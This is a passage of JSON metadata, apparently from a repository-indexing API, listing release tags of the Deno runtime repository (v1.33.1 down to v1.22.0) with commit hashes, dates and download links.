api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{